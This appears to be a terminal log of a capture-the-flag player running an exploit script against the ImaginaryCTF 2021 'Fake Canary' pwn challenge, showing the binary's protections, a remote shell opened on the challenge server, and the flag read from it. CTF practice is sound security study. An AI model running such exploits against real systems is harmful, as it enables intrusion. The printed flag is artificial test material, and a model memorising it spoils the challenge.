mito@ubuntu:~/CTF/ImaginaryCTF_2021/Pwn_Fake_Canary_100$ python solve.py r
[*] '/home/mito/CTF/ImaginaryCTF_2021/Pwn_Fake_Canary_100/fake_canary'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to chal.imaginaryctf.org on port 42002: Done
[*] Switching to interactive mode
$ id
uid=1000 gid=1000 groups=1000
$ ls -l
total 16
-rw-r--r-- 1 nobody nogroup   41 Jul 23 16:32 flag.txt
-rwxr-xr-x 1 nobody nogroup 8560 Jul 23 16:32 run
$ cat flag.txt
ictf{m4ke_y0ur_canaries_r4ndom_f492b211}
